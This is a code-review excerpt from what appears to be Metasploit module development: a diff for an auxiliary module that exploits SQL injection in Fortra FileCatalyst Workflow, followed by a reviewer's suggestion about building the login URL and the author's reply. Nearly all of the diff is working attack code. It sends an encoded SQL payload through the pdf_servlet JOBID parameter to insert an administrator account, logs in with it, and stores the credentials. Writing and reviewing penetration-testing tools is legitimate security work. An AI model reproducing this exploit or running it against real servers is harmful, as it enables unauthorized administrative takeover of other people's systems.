modules/auxiliary/admin/http/fortra_filecatalyst_workflow_sqli.rb

```diff
@@ -0,0 +1,272 @@
+              '%270%27%2C+1%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27%27%2C+0%2C+0%2C+0%2C+%27%27%2C+0%2C+' \
+              "%27DEFAULT%27%2C+0%2C#{pw_creationdate}%2C+-1%2C+0%2C+NULL%2C+0%29%3B--+-"
+
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, "workflow/servlet/pdf_servlet?JOBID=#{payload}"),
+      'headers' => {
+        'Cookie' => "JSESSIONID=#{jsessionid}"
+      }
+    )
+
+    unless res
+      fail_with(Failure::Unreachable, 'Failed to receive a reply from the server.')
+    end
+
+    fail_with(Failure::UnexpectedReply, "Unexpected HTTP code from the target: #{res.code}") unless res.code == 200
+    fail_with(Failure::UnexpectedReply, 'Unexpected reply from the target.') unless res.body.to_s == ''
+    print_good('SQL injection successful!')
+
+    print_status('Confirming credentials...')
+
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'workflow/jsp/logon.jsp'),
+      'headers' => {
+        'Cookie' => "JSESSIONID=#{jsessionid}"
+      }
+    )
+
+    fail_with(Failure::Unreachable, 'Failed to receive a reply from the server.') unless res
+
+    body = res.body
+    if body =~ /name="FCWEB\.FORM\.TOKEN" value="([^"]+)"/
+      token_value = ::Regexp.last_match(1)
+      print_status("FCWEB.FORM.TOKEN value: #{token_value}")
+    else
+      fail_with(Failure::UnexpectedReply, 'FCWEB.FORM.TOKEN not found.')
+    end
+
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'workflow/logon.do'),
+      'headers' => {
+        'Cookie' => "JSESSIONID=#{jsessionid}",
+        'Content-Type' => 'application/x-www-form-urlencoded'
+      },
+      'vars_post' => {
+        'username' => datastore['NEW_USERNAME'],
+        'password' => datastore['NEW_PASSWORD'],
+        'FCWEB.FORM.TOKEN' => token_value.to_s,
+        'submit' => 'Login'
+      }
+    )
+
+    unless res
+      fail_with(Failure::Unreachable, 'Failed to receive a reply from the server.')
+    end
+
+    html = res.get_html_document
+    title_block = html.at_css('.titleBlock')
+
+    if title_block
+      title_text = title_block.text.strip
+      if title_text.include?('Administration')
+        store_valid_credential(user: datastore['NEW_USERNAME'], private: datastore['NEW_PASSWORD'], proof: html)
+        print_good('Login successful!')
+      else
+        fail_with(Failure::UnexpectedReply, 'Expected string "Administration" not found.')
+      end
+    else
+      fail_with(Failure::UnexpectedReply, 'Expected titleBlock not found.')
+    end
+
+    print_good("New admin user was successfully injected:\n\t#{datastore['NEW_USERNAME']}:#{datastore['NEW_PASSWORD']}")
+    print_good("Login at: http://#{datastore['RHOSTS']}:#{datastore['RPORT']}#{datastore['TARGETURI']}workflow/jsp/logon.jsp")
```

Comment:
This should be replaced with [`#full_uri`](https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/core/exploit/remote/http_client.rb#L528C7-L528C15) which will properly account for SSL and IPv6 addresses.

```suggestion
    print_good("Login at: #{full_uri(normalize_uri(target_uri, 'workflow/jsp/logon.jsp'))}")
```

Reply:
Thank you, updated.